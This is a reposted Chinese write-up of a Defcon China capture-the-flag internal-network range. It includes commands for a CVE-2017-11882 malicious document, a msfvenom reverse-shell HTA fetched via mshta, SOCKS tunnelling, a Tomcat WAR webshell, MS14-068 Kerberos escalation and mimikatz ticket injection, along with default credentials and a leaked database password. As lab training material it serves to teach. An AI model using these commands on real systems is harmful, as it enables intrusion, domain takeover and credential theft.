碼上快樂

相關內容    簡體    繁體

Defcon China 靶場題 - 內網滲透Writeup

本文轉載自   查看原文   2018-05-12 17:32   5254    ctf

對內網滲透的題目挺感興趣的,所以做了一發。

先給個拓撲圖

1. wordpress

http://192.168.1.2/是一個wordpress

文件上傳: http://192.168.1.2/wp-content/uploads/
后台可admin/admin登錄
ssh可root/admin登錄

2. word cve釣魚

從配置中看到有個文檔web的配置

http的log日志可以看到,也有一個bot每隔一段時間會去請求report.doc

嘗試用CVE-2017-11882打一波

1、由於環境問題,先做ssh的端口轉發
ssh -CfNg -R 13339:127.0.0.1:13338 root@192.168.1.2

2、生成一個hta文件
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.2 lport=13339 -f hta-psh -o a.hta

3、生成惡意doc文件
python Command43b_CVE-2017-11882.py -c "mshta http://192.168.1.2:8000/a.hta" -o test.doc

4、msf監聽端口上線
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 13338
exploit -j

進入了192.168.2.1/24段

Get Flag.

3.tomcat

添加路由
run autoroute -s 192.168.2.1/24

進行端口掃描
use auxiliary/scanner/portscan/tcp
set PORTS 3389,445,22,80,8080
set RHoSTS 192.168.2.1/24
set THREADS 50
exploit

由於msf是s4代理,還很慢,就使用ew來做

先上傳一下ew
meterpreter > upload /media/psf/Home/ew.exe c:/Users/RTF/Desktop/

linux,192.168.1.2做監聽
./ew_for_linux64 -s rcsocks -l 10080 -e 8881

windows,192.168.2.114反向連接
c:/Users/RTF/Desktop/ew.exe -s rssocks -d 192.168.1.2 -e 8881

對內網的192.168.2.104的web進行測試,但是沒測出什么.

但是8080存在tomcat,默認賬號密碼可以進入,然后部署war包獲得一個root權限的webshell

還有一個flag在/var/www/flag,另外翻到數據庫密碼,連接進去看是有一個提示.

/var/www/html/inc/config.php:

$DB=new MyDB("127.0.0.1","mail","mail123456","my_mail");

4.pc windows

爆破一發,發現可以進入192.168.2.112

做了端口轉發登錄3389,然后以管理員權限執行木馬,上線

這里有一個問題就是,一開始只是拿到域內機器的本地administrator權限,所以net user /domain是無法給域控發送一些請求信息,但是提升到system權限即可。

5.dc windows

看了一下pc機器的進程,發現是有域用戶在上面。

抓一下明文密碼

可以看到pc用戶只是一個普通域用戶

這里吐槽一下...賽題居然都不復現一下,一開始都沒有任何域用戶的提示信息,這個pc用戶都是后面加上去的。

確認一下域控位置是為\DC,因為remark備注了,所以比較明顯

然后就是試一下ms14-068

使用方法:
ms14-068.exe -u 域成員名@域名 -s 域成員sid -d 域控制器地址 -p 域成員密碼

MS14-068.exe -u pc@ad.com -s S-1-5-21-2251846888-1669908150-1970748206-1116 -d 192.168.2.10 -p admin@test.COM

其中域成員ad/pc的sid獲取,先把進程切換了到了ad/pc權限下面,當然如果只是本地賬號權限的話,可以用dsquery + dsget獲取,另外注意域成員名@域名,后面的域名必須使用完整dns名稱。

然后用mimikatz把憑證清空一下

mimikatz.exe "kerberos::purge" "kerberos::list" "exit"

然后注入一下憑證

mimikatz.exe "kerberos::ptc TGT_pc@ad.com.ccache"

最后獲取flag


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 內網滲透之vlunstack靶場 內網滲透靶場學習實驗 cmseasy&內網滲透 Writeup 【內網滲透】ATT&CK紅日靶場(一)學習內網滲透 紅日安全內網靶場(三)滲透記錄 一次簡單的內網滲透靶場實戰 內網滲透靶場測試:(一)反向代理,互聯互通 滲透測試帶防御的內網域(ack123靶場) 【內網滲透系列】內網靶場之輕松拿下域控--突破安全策略接管域控 xss hack學習靶場 writeup
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM